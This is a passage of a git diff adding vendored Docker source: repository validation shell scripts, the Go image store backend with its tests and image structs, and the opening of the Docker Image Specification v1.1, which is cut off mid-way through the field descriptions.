)" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'api/swagger.yaml' || true) ) +unset IFS + +if [ ${#files[@]} -gt 0 ]; then + yamllint -c ${SCRIPTDIR}/.swagger-yamllint api/swagger.yaml + swagger validate api/swagger.yaml +fi diff --git a/vendor/github.com/docker/docker/hack/validate/swagger-gen b/vendor/github.com/docker/docker/hack/validate/swagger-gen new file mode 100755 index 0000000000..008abc7e0d --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/swagger-gen @@ -0,0 +1,29 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'api/types/' 'api/swagger.yaml' || true) ) +unset IFS + +if [ ${#files[@]} -gt 0 ]; then + ${SCRIPTDIR}/../generate-swagger-api.sh 2> /dev/null + # Let see if the working directory is clean + diffs="$(git status --porcelain -- api/types/ 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of hack/generate-swagger-api.sh differs' + echo + echo "$diffs" + echo + echo 'Please update api/swagger.yaml with any api changes, then ' + echo 'run `hack/generate-swagger-api.sh`.' + } >&2 + false + else + echo 'Congratulations! All api changes are done the right way.' + fi +else + echo 'No api/types/ or api/swagger.yaml changes in diff.' +fi diff --git a/vendor/github.com/docker/docker/hack/validate/test-imports b/vendor/github.com/docker/docker/hack/validate/test-imports new file mode 100755 index 0000000000..373caa2f29 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/test-imports @@ -0,0 +1,38 @@ +#!/bin/bash +# Make sure we're not using gos' Testing package any more in integration-cli + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'integration-cli/*.go' || true) ) +unset IFS + +badFiles=() +for f in "${files[@]}"; do + # skip check_test.go since it *does* use the testing package + if [ "$f" = "integration-cli/check_test.go" ]; then + continue + fi + + # we use "git show" here to validate that what's committed doesn't contain golang built-in testing + if git show "$VALIDATE_HEAD:$f" | grep -q testing.T; then + if [ "$(echo $f | grep '_test')" ]; then + # allow testing.T for non- _test files + badFiles+=( "$f" ) + fi + fi +done + +if [ ${#badFiles[@]} -eq 0 ]; then + echo 'Congratulations! No testing.T found.' +else + { + echo "These files use the wrong testing infrastructure:" + for f in "${badFiles[@]}"; do + echo " - $f" + done + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/toml b/vendor/github.com/docker/docker/hack/validate/toml new file mode 100755 index 0000000000..a0cb158dbd --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/toml @@ -0,0 +1,31 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'MAINTAINERS' || true) ) +unset IFS + +badFiles=() +for f in "${files[@]}"; do + # we use "git show" here to validate that what's committed has valid toml syntax + if ! git show "$VALIDATE_HEAD:$f" | tomlv /proc/self/fd/0 ; then + badFiles+=( "$f" ) + fi +done + +if [ ${#badFiles[@]} -eq 0 ]; then + echo 'Congratulations! All toml source files changed here have valid syntax.' +else + { + echo "These files are not valid toml:" + for f in "${badFiles[@]}"; do + echo " - $f" + done + echo + echo 'Please reformat the above files as valid toml' + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/vendor b/vendor/github.com/docker/docker/hack/validate/vendor new file mode 100755 index 0000000000..0cb5aabdfa --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/vendor @@ -0,0 +1,30 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'vendor.conf' 'vendor/' || true) ) +unset IFS + +if [ ${#files[@]} -gt 0 ]; then + # We run vndr to and see if we have a diff afterwards + vndr + # Let see if the working directory is clean + diffs="$(git status --porcelain -- vendor 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of vndr differs' + echo + echo "$diffs" + echo + echo 'Please vendor your package with github.com/LK4D4/vndr.' + echo + } >&2 + false + else + echo 'Congratulations! All vendoring changes are done the right way.' + fi +else + echo 'No vendor changes in diff.' +fi diff --git a/vendor/github.com/docker/docker/hack/validate/vet b/vendor/github.com/docker/docker/hack/validate/vet new file mode 100755 index 0000000000..64760489ea --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/vet @@ -0,0 +1,32 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' || true) ) +unset IFS + +errors=() +for f in "${files[@]}"; do + failedVet=$(go vet "$f") + if [ "$failedVet" ]; then + errors+=( "$failedVet" ) + fi +done + + +if [ ${#errors[@]} -eq 0 ]; then + echo 'Congratulations! All Go source files have been vetted.' +else + { + echo "Errors from go vet:" + for err in "${errors[@]}"; do + echo " - $err" + done + echo + echo 'Please fix the above errors. You can test via "go vet" and commit the result.' + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/vendor.sh b/vendor/github.com/docker/docker/hack/vendor.sh new file mode 100755 index 0000000000..9a4d038539 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/vendor.sh @@ -0,0 +1,15 @@ +#!/bin/bash + +# This file is just wrapper around vndr (github.com/LK4D4/vndr) tool. +# For updating dependencies you should change `vendor.conf` file in root of the +# project. Please refer to https://github.com/LK4D4/vndr/blob/master/README.md for +# vndr usage. + +set -e + +if ! hash vndr; then + echo "Please install vndr with \"go get github.com/LK4D4/vndr\" and put it in your \$GOPATH" + exit 1 +fi + +vndr "$@" diff --git a/vendor/github.com/docker/docker/image/fs.go b/vendor/github.com/docker/docker/image/fs.go new file mode 100644 index 0000000000..39cfbf5d74 --- /dev/null +++ b/vendor/github.com/docker/docker/image/fs.go @@ -0,0 +1,173 @@ +package image + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/ioutils" +) + +// DigestWalkFunc is function called by StoreBackend.Walk +type DigestWalkFunc func(id digest.Digest) error + +// StoreBackend provides interface for image.Store persistence +type StoreBackend interface { + Walk(f DigestWalkFunc) error + Get(id digest.Digest) ([]byte, error) + Set(data []byte) (digest.Digest, error) + Delete(id digest.Digest) error + SetMetadata(id digest.Digest, key string, data []byte) error + GetMetadata(id digest.Digest, key string) ([]byte, error) + DeleteMetadata(id digest.Digest, key string) error +} + +// fs implements StoreBackend using the filesystem. +type fs struct { + sync.RWMutex + root string +} + +const ( + contentDirName = "content" + metadataDirName = "metadata" +) + +// NewFSStoreBackend returns new filesystem based backend for image.Store +func NewFSStoreBackend(root string) (StoreBackend, error) { + return newFSStore(root) +} + +func newFSStore(root string) (*fs, error) { + s := &fs{ + root: root, + } + if err := os.MkdirAll(filepath.Join(root, contentDirName, string(digest.Canonical)), 0700); err != nil { + return nil, err + } + if err := os.MkdirAll(filepath.Join(root, metadataDirName, string(digest.Canonical)), 0700); err != nil { + return nil, err + } + return s, nil +} + +func (s *fs) contentFile(dgst digest.Digest) string { + return filepath.Join(s.root, contentDirName, string(dgst.Algorithm()), dgst.Hex()) +} + +func (s *fs) metadataDir(dgst digest.Digest) string { + return filepath.Join(s.root, metadataDirName, string(dgst.Algorithm()), dgst.Hex()) +} + +// Walk calls the supplied callback for each image ID in the storage backend. +func (s *fs) Walk(f DigestWalkFunc) error { + // Only Canonical digest (sha256) is currently supported + s.RLock() + dir, err := ioutil.ReadDir(filepath.Join(s.root, contentDirName, string(digest.Canonical))) + s.RUnlock() + if err != nil { + return err + } + for _, v := range dir { + dgst := digest.NewDigestFromHex(string(digest.Canonical), v.Name()) + if err := dgst.Validate(); err != nil { + logrus.Debugf("Skipping invalid digest %s: %s", dgst, err) + continue + } + if err := f(dgst); err != nil { + return err + } + } + return nil +} + +// Get returns the content stored under a given digest. +func (s *fs) Get(dgst digest.Digest) ([]byte, error) { + s.RLock() + defer s.RUnlock() + + return s.get(dgst) +} + +func (s *fs) get(dgst digest.Digest) ([]byte, error) { + content, err := ioutil.ReadFile(s.contentFile(dgst)) + if err != nil { + return nil, err + } + + // todo: maybe optional + if digest.FromBytes(content) != dgst { + return nil, fmt.Errorf("failed to verify: %v", dgst) + } + + return content, nil +} + +// Set stores content by checksum. +func (s *fs) Set(data []byte) (digest.Digest, error) { + s.Lock() + defer s.Unlock() + + if len(data) == 0 { + return "", fmt.Errorf("Invalid empty data") + } + + dgst := digest.FromBytes(data) + if err := ioutils.AtomicWriteFile(s.contentFile(dgst), data, 0600); err != nil { + return "", err + } + + return dgst, nil +} + +// Delete removes content and metadata files associated with the digest. +func (s *fs) Delete(dgst digest.Digest) error { + s.Lock() + defer s.Unlock() + + if err := os.RemoveAll(s.metadataDir(dgst)); err != nil { + return err + } + if err := os.Remove(s.contentFile(dgst)); err != nil { + return err + } + return nil +} + +// SetMetadata sets metadata for a given ID. It fails if there's no base file. +func (s *fs) SetMetadata(dgst digest.Digest, key string, data []byte) error { + s.Lock() + defer s.Unlock() + if _, err := s.get(dgst); err != nil { + return err + } + + baseDir := filepath.Join(s.metadataDir(dgst)) + if err := os.MkdirAll(baseDir, 0700); err != nil { + return err + } + return ioutils.AtomicWriteFile(filepath.Join(s.metadataDir(dgst), key), data, 0600) +} + +// GetMetadata returns metadata for a given digest. +func (s *fs) GetMetadata(dgst digest.Digest, key string) ([]byte, error) { + s.RLock() + defer s.RUnlock() + + if _, err := s.get(dgst); err != nil { + return nil, err + } + return ioutil.ReadFile(filepath.Join(s.metadataDir(dgst), key)) +} + +// DeleteMetadata removes the metadata associated with a digest. +func (s *fs) DeleteMetadata(dgst digest.Digest, key string) error { + s.Lock() + defer s.Unlock() + + return os.RemoveAll(filepath.Join(s.metadataDir(dgst), key)) +} diff --git a/vendor/github.com/docker/docker/image/fs_test.go b/vendor/github.com/docker/docker/image/fs_test.go new file mode 100644 index 0000000000..8d602d97eb --- /dev/null +++ b/vendor/github.com/docker/docker/image/fs_test.go @@ -0,0 +1,384 @@ +package image + +import ( + "bytes" + "crypto/rand" + "crypto/sha256" + "encoding/hex" + "errors" + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/distribution/digest" +) + +func TestFSGetSet(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + testGetSet(t, fs) +} + +func TestFSGetInvalidData(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + id, err := fs.Set([]byte("foobar")) + if err != nil { + t.Fatal(err) + } + + dgst := digest.Digest(id) + + if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, string(dgst.Algorithm()), dgst.Hex()), []byte("foobar2"), 0600); err != nil { + t.Fatal(err) + } + + _, err = fs.Get(id) + if err == nil { + t.Fatal("Expected get to fail after data modification.") + } +} + +func TestFSInvalidSet(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + id := digest.FromBytes([]byte("foobar")) + err = os.Mkdir(filepath.Join(tmpdir, contentDirName, string(id.Algorithm()), id.Hex()), 0700) + if err != nil { + t.Fatal(err) + } + + _, err = fs.Set([]byte("foobar")) + if err == nil { + t.Fatal("Expecting error from invalid filesystem data.") + } +} + +func TestFSInvalidRoot(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + tcases := []struct { + root, invalidFile string + }{ + {"root", "root"}, + {"root", "root/content"}, + {"root", "root/metadata"}, + } + + for _, tc := range tcases { + root := filepath.Join(tmpdir, tc.root) + filePath := filepath.Join(tmpdir, tc.invalidFile) + err := os.MkdirAll(filepath.Dir(filePath), 0700) + if err != nil { + t.Fatal(err) + } + f, err := os.Create(filePath) + if err != nil { + t.Fatal(err) + } + f.Close() + + _, err = NewFSStoreBackend(root) + if err == nil { + t.Fatalf("Expected error from root %q and invlid file %q", tc.root, tc.invalidFile) + } + + os.RemoveAll(root) + } + +} + +func testMetadataGetSet(t *testing.T, store StoreBackend) { + id, err := store.Set([]byte("foo")) + if err != nil { + t.Fatal(err) + } + id2, err := store.Set([]byte("bar")) + if err != nil { + t.Fatal(err) + } + + tcases := []struct { + id digest.Digest + key string + value []byte + }{ + {id, "tkey", []byte("tval1")}, + {id, "tkey2", []byte("tval2")}, + {id2, "tkey", []byte("tval3")}, + } + + for _, tc := range tcases { + err = store.SetMetadata(tc.id, tc.key, tc.value) + if err != nil { + t.Fatal(err) + } + + actual, err := store.GetMetadata(tc.id, tc.key) + if err != nil { + t.Fatal(err) + } + if bytes.Compare(actual, tc.value) != 0 { + t.Fatalf("Metadata expected %q, got %q", tc.value, actual) + } + } + + _, err = store.GetMetadata(id2, "tkey2") + if err == nil { + t.Fatal("Expected error for getting metadata for unknown key") + } + + id3 := digest.FromBytes([]byte("baz")) + err = store.SetMetadata(id3, "tkey", []byte("tval")) + if err == nil { + t.Fatal("Expected error for setting metadata for unknown ID.") + } + + _, err = store.GetMetadata(id3, "tkey") + if err == nil { + t.Fatal("Expected error for getting metadata for unknown ID.") + } +} + +func TestFSMetadataGetSet(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + testMetadataGetSet(t, fs) +} + +func TestFSDelete(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + testDelete(t, fs) +} + +func TestFSWalker(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + testWalker(t, fs) +} + +func TestFSInvalidWalker(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + fooID, err := fs.Set([]byte("foo")) + if err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, "sha256/foobar"), []byte("foobar"), 0600); err != nil { + t.Fatal(err) + } + + n := 0 + err = fs.Walk(func(id digest.Digest) error { + if id != fooID { + t.Fatalf("Invalid walker ID %q, expected %q", id, fooID) + } + n++ + return nil + }) + if err != nil { + t.Fatalf("Invalid data should not have caused walker error, got %v", err) + } + if n != 1 { + t.Fatalf("Expected 1 walk initialization, got %d", n) + } +} + +func testGetSet(t *testing.T, store StoreBackend) { + type tcase struct { + input []byte + expected digest.Digest + } + tcases := []tcase{ + {[]byte("foobar"), digest.Digest("sha256:c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2")}, + } + + randomInput := make([]byte, 8*1024) + _, err := rand.Read(randomInput) + if err != nil { + t.Fatal(err) + } + // skipping use of digest pkg because its used by the implementation + h := sha256.New() + _, err = h.Write(randomInput) + if err != nil { + t.Fatal(err) + } + tcases = append(tcases, tcase{ + input: randomInput, + expected: digest.Digest("sha256:" + hex.EncodeToString(h.Sum(nil))), + }) + + for _, tc := range tcases { + id, err := store.Set([]byte(tc.input)) + if err != nil { + t.Fatal(err) + } + if id != tc.expected { + t.Fatalf("Expected ID %q, got %q", tc.expected, id) + } + } + + for _, emptyData := range [][]byte{nil, {}} { + _, err := store.Set(emptyData) + if err == nil { + t.Fatal("Expected error for nil input.") + } + } + + for _, tc := range tcases { + data, err := store.Get(tc.expected) + if err != nil { + t.Fatal(err) + } + if bytes.Compare(data, tc.input) != 0 { + t.Fatalf("Expected data %q, got %q", tc.input, data) + } + } + + for _, key := range []digest.Digest{"foobar:abc", "sha256:abc", "sha256:c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2a"} { + _, err := store.Get(key) + if err == nil { + t.Fatalf("Expected error for ID %q.", key) + } + } + +} + +func testDelete(t *testing.T, store StoreBackend) { + id, err := store.Set([]byte("foo")) + if err != nil { + t.Fatal(err) + } + id2, err := store.Set([]byte("bar")) + if err != nil { + t.Fatal(err) + } + + err = store.Delete(id) + if err != nil { + t.Fatal(err) + } + + _, err = store.Get(id) + if err == nil { + t.Fatalf("Expected getting deleted item %q to fail", id) + } + _, err = store.Get(id2) + if err != nil { + t.Fatal(err) + } + + err = store.Delete(id2) + if err != nil { + t.Fatal(err) + } + _, err = store.Get(id2) + if err == nil { + t.Fatalf("Expected getting deleted item %q to fail", id2) + } +} + +func testWalker(t *testing.T, store StoreBackend) { + id, err := store.Set([]byte("foo")) + if err != nil { + t.Fatal(err) + } + id2, err := store.Set([]byte("bar")) + if err != nil { + t.Fatal(err) + } + + tcases := make(map[digest.Digest]struct{}) + tcases[id] = struct{}{} + tcases[id2] = struct{}{} + n := 0 + err = store.Walk(func(id digest.Digest) error { + delete(tcases, id) + n++ + return nil + }) + if err != nil { + t.Fatal(err) + } + + if n != 2 { + t.Fatalf("Expected 2 walk initializations, got %d", n) + } + if len(tcases) != 0 { + t.Fatalf("Expected empty unwalked set, got %+v", tcases) + } + + // stop on error + tcases = make(map[digest.Digest]struct{}) + tcases[id] = struct{}{} + err = store.Walk(func(id digest.Digest) error { + return errors.New("") + }) + if err == nil { + t.Fatalf("Exected error from walker.") + } +} diff --git a/vendor/github.com/docker/docker/image/image.go b/vendor/github.com/docker/docker/image/image.go new file mode 100644 index 0000000000..29a990a556 --- /dev/null +++ b/vendor/github.com/docker/docker/image/image.go @@ -0,0 +1,150 @@ +package image + +import ( + "encoding/json" + "errors" + "io" + "time" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types/container" +) + +// ID is the content-addressable ID of an image. +type ID digest.Digest + +func (id ID) String() string { + return id.Digest().String() +} + +// Digest converts ID into a digest +func (id ID) Digest() digest.Digest { + return digest.Digest(id) +} + +// IDFromDigest creates an ID from a digest +func IDFromDigest(digest digest.Digest) ID { + return ID(digest) +} + +// V1Image stores the V1 image configuration. +type V1Image struct { + // ID a unique 64 character identifier of the image + ID string `json:"id,omitempty"` + // Parent id of the image + Parent string `json:"parent,omitempty"` + // Comment user added comment + Comment string `json:"comment,omitempty"` + // Created timestamp when image was created + Created time.Time `json:"created"` + // Container is the id of the container used to commit + Container string `json:"container,omitempty"` + // ContainerConfig is the configuration of the container that is committed into the image + ContainerConfig container.Config `json:"container_config,omitempty"` + // DockerVersion specifies version on which image is built + DockerVersion string `json:"docker_version,omitempty"` + // Author of the image + Author string `json:"author,omitempty"` + // Config is the configuration of the container received from the client + Config *container.Config `json:"config,omitempty"` + // Architecture is the hardware that the image is build and runs on + Architecture string `json:"architecture,omitempty"` + // OS is the operating system used to build and run the image + OS string `json:"os,omitempty"` + // Size is the total size of the image including all layers it is composed of + Size int64 `json:",omitempty"` +} + +// Image stores the image configuration +type Image struct { + V1Image + Parent ID `json:"parent,omitempty"` + RootFS *RootFS `json:"rootfs,omitempty"` + History []History `json:"history,omitempty"` + OSVersion string `json:"os.version,omitempty"` + OSFeatures []string `json:"os.features,omitempty"` + + // rawJSON caches the immutable JSON associated with this image. + rawJSON []byte + + // computedID is the ID computed from the hash of the image config. + // Not to be confused with the legacy V1 ID in V1Image. + computedID ID +} + +// RawJSON returns the immutable JSON associated with the image. +func (img *Image) RawJSON() []byte { + return img.rawJSON +} + +// ID returns the image's content-addressable ID. +func (img *Image) ID() ID { + return img.computedID +} + +// ImageID stringifies ID. +func (img *Image) ImageID() string { + return img.ID().String() +} + +// RunConfig returns the image's container config. +func (img *Image) RunConfig() *container.Config { + return img.Config +} + +// MarshalJSON serializes the image to JSON. It sorts the top-level keys so +// that JSON that's been manipulated by a push/pull cycle with a legacy +// registry won't end up with a different key order. +func (img *Image) MarshalJSON() ([]byte, error) { + type MarshalImage Image + + pass1, err := json.Marshal(MarshalImage(*img)) + if err != nil { + return nil, err + } + + var c map[string]*json.RawMessage + if err := json.Unmarshal(pass1, &c); err != nil { + return nil, err + } + return json.Marshal(c) +} + +// History stores build commands that were used to create an image +type History struct { + // Created timestamp for build point + Created time.Time `json:"created"` + // Author of the build point + Author string `json:"author,omitempty"` + // CreatedBy keeps the Dockerfile command used while building image. + CreatedBy string `json:"created_by,omitempty"` + // Comment is custom message set by the user when creating the image. + Comment string `json:"comment,omitempty"` + // EmptyLayer is set to true if this history item did not generate a + // layer. Otherwise, the history item is associated with the next + // layer in the RootFS section. + EmptyLayer bool `json:"empty_layer,omitempty"` +} + +// Exporter provides interface for exporting and importing images +type Exporter interface { + Load(io.ReadCloser, io.Writer, bool) error + // TODO: Load(net.Context, io.ReadCloser, <- chan StatusMessage) error + Save([]string, io.Writer) error +} + +// NewFromJSON creates an Image configuration from json. +func NewFromJSON(src []byte) (*Image, error) { + img := &Image{} + + if err := json.Unmarshal(src, img); err != nil { + return nil, err + } + if img.RootFS == nil { + return nil, errors.New("Invalid image JSON, no RootFS key.") + } + + img.rawJSON = src + + return img, nil +} diff --git a/vendor/github.com/docker/docker/image/image_test.go b/vendor/github.com/docker/docker/image/image_test.go new file mode 100644 index 0000000000..525023b813 --- /dev/null +++ b/vendor/github.com/docker/docker/image/image_test.go @@ -0,0 +1,59 @@ +package image + +import ( + "encoding/json" + "sort" + "strings" + "testing" +) + +const sampleImageJSON = `{ + "architecture": "amd64", + "os": "linux", + "config": {}, + "rootfs": { + "type": "layers", + "diff_ids": [] + } +}` + +func TestJSON(t *testing.T) { + img, err := NewFromJSON([]byte(sampleImageJSON)) + if err != nil { + t.Fatal(err) + } + rawJSON := img.RawJSON() + if string(rawJSON) != sampleImageJSON { + t.Fatalf("Raw JSON of config didn't match: expected %+v, got %v", sampleImageJSON, rawJSON) + } +} + +func TestInvalidJSON(t *testing.T) { + _, err := NewFromJSON([]byte("{}")) + if err == nil { + t.Fatal("Expected JSON parse error") + } +} + +func TestMarshalKeyOrder(t *testing.T) { + b, err := json.Marshal(&Image{ + V1Image: V1Image{ + Comment: "a", + Author: "b", + Architecture: "c", + }, + }) + if err != nil { + t.Fatal(err) + } + + expectedOrder := []string{"architecture", "author", "comment"} + var indexes []int + for _, k := range expectedOrder { + indexes = append(indexes, strings.Index(string(b), k)) + } + + if !sort.IntsAreSorted(indexes) { + t.Fatal("invalid key order in JSON: ", string(b)) + } +} diff --git a/vendor/github.com/docker/docker/image/rootfs.go b/vendor/github.com/docker/docker/image/rootfs.go new file mode 100644 index 0000000000..7b24e3ed1e --- /dev/null +++ b/vendor/github.com/docker/docker/image/rootfs.go @@ -0,0 +1,44 @@ +package image + +import ( + "runtime" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/layer" +) + +// TypeLayers is used for RootFS.Type for filesystems organized into layers. +const TypeLayers = "layers" + +// typeLayersWithBase is an older format used by Windows up to v1.12. We +// explicitly handle this as an error case to ensure that a daemon which still +// has an older image like this on disk can still start, even though the +// image itself is not usable. See https://github.com/docker/docker/pull/25806. +const typeLayersWithBase = "layers+base" + +// RootFS describes images root filesystem +// This is currently a placeholder that only supports layers. In the future +// this can be made into an interface that supports different implementations. +type RootFS struct { + Type string `json:"type"` + DiffIDs []layer.DiffID `json:"diff_ids,omitempty"` +} + +// NewRootFS returns empty RootFS struct +func NewRootFS() *RootFS { + return &RootFS{Type: TypeLayers} +} + +// Append appends a new diffID to rootfs +func (r *RootFS) Append(id layer.DiffID) { + r.DiffIDs = append(r.DiffIDs, id) +} + +// ChainID returns the ChainID for the top layer in RootFS. +func (r *RootFS) ChainID() layer.ChainID { + if runtime.GOOS == "windows" && r.Type == typeLayersWithBase { + logrus.Warnf("Layer type is unsupported on this platform. DiffIDs: '%v'", r.DiffIDs) + return "" + } + return layer.CreateChainID(r.DiffIDs) +} diff --git a/vendor/github.com/docker/docker/image/spec/v1.1.md b/vendor/github.com/docker/docker/image/spec/v1.1.md new file mode 100644 index 0000000000..83f138011d --- /dev/null +++ b/vendor/github.com/docker/docker/image/spec/v1.1.md @@ -0,0 +1,637 @@ +# Docker Image Specification v1.1.0 + +An *Image* is an ordered collection of root filesystem changes and the +corresponding execution parameters for use within a container runtime. This +specification outlines the format of these filesystem changes and corresponding +parameters and describes how to create and use them for use with a container +runtime and execution tool. + +This version of the image specification was adopted starting in Docker 1.10. + +## Terminology + +This specification uses the following terms: + +
+
+ Layer +
+
+ Images are composed of layers. Each layer is a set of filesystem + changes. Layers do not have configuration metadata such as environment + variables or default arguments - these are properties of the image as a + whole rather than any particular layer. +
+
+ Image JSON +
+
+ Each image has an associated JSON structure which describes some + basic information about the image such as date created, author, and the + ID of its parent image as well as execution/runtime configuration like + its entry point, default arguments, CPU/memory shares, networking, and + volumes. The JSON structure also references a cryptographic hash of + each layer used by the image, and provides history information for + those layers. This JSON is considered to be immutable, because changing + it would change the computed ImageID. Changing it means creating a new + derived image, instead of changing the existing image. +
+
+ Image Filesystem Changeset +
+
+ Each layer has an archive of the files which have been added, changed, + or deleted relative to its parent layer. Using a layer-based or union + filesystem such as AUFS, or by computing the diff from filesystem + snapshots, the filesystem changeset can be used to present a series of + image layers as if they were one cohesive filesystem. +
+
+ Layer DiffID +
+
+ Layers are referenced by cryptographic hashes of their serialized + representation. This is a SHA256 digest over the tar archive used to + transport the layer, represented as a hexadecimal encoding of 256 bits, e.g., + sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Layers must be packed and unpacked reproducibly to avoid changing the + layer ID, for example by using tar-split to save the tar headers. Note + that the digest used as the layer ID is taken over an uncompressed + version of the tar. +
+
+ Layer ChainID +
+
+ For convenience, it is sometimes useful to refer to a stack of layers + with a single identifier. This is called a ChainID. For a + single layer (or the layer at the bottom of a stack), the + ChainID is equal to the layer's DiffID. + Otherwise the ChainID is given by the formula: + ChainID(layerN) = SHA256hex(ChainID(layerN-1) + " " + DiffID(layerN)). +
+
+ ImageID +
+
+ Each image's ID is given by the SHA256 hash of its configuration JSON. It is + represented as a hexadecimal encoding of 256 bits, e.g., + sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Since the configuration JSON that gets hashed references hashes of each + layer in the image, this formulation of the ImageID makes images + content-addressable. +
+
+ Tag +
+
+ A tag serves to map a descriptive, user-given name to any single image + ID. Tag values are limited to the set of characters + [a-zA-Z0-9_.-], except they may not start with a . + or - character. Tags are limited to 127 characters. +
+
+ Repository +
+
+ A collection of tags grouped under a common prefix (the name component + before :). For example, in an image tagged with the name + my-app:3.1.4, my-app is the Repository + component of the name. A repository name is made up of slash-separated + name components, optionally prefixed by a DNS hostname. The hostname + must follow comply with standard DNS rules, but may not contain + _ characters. If a hostname is present, it may optionally + be followed by a port number in the format :8080. + Name components may contain lowercase characters, digits, and + separators. A separator is defined as a period, one or two underscores, + or one or more dashes. A name component may not start or end with + a separator. +
+
+ +## Image JSON Description + +Here is an example image JSON file: + +``` +{ + "created": "2015-10-31T22:22:56.015925234Z", + "author": "Alyssa P. Hacker <alyspdev@example.com>", + "architecture": "amd64", + "os": "linux", + "config": { + "User": "alice", + "Memory": 2048, + "MemorySwap": 4096, + "CpuShares": 8, + "ExposedPorts": { + "8080/tcp": {} + }, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "FOO=docker_is_a_really", + "BAR=great_tool_you_know" + ], + "Entrypoint": [ + "/bin/my-app-binary" + ], + "Cmd": [ + "--foreground", + "--config", + "/etc/my-app.d/default.cfg" + ], + "Volumes": { + "/var/job-result-data": {}, + "/var/log/my-app-logs": {}, + }, + "WorkingDir": "/home/alice", + }, + "rootfs": { + "diff_ids": [ + "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1", + "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + ], + "type": "layers" + }, + "history": [ + { + "created": "2015-10-31T22:22:54.690851953Z", + "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /" + }, + { + "created": "2015-10-31T22:22:55.613815829Z", + "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]", + "empty_layer": true + } + ] +} +``` + +Note that image JSON files produced by Docker don't contain formatting +whitespace. It has been added to this example for clarity. + +### Image JSON Field Descriptions + +
+
+ created string +
+
+ ISO-8601 formatted combined date and time at which the image was + created. +
+
+ author string +
+
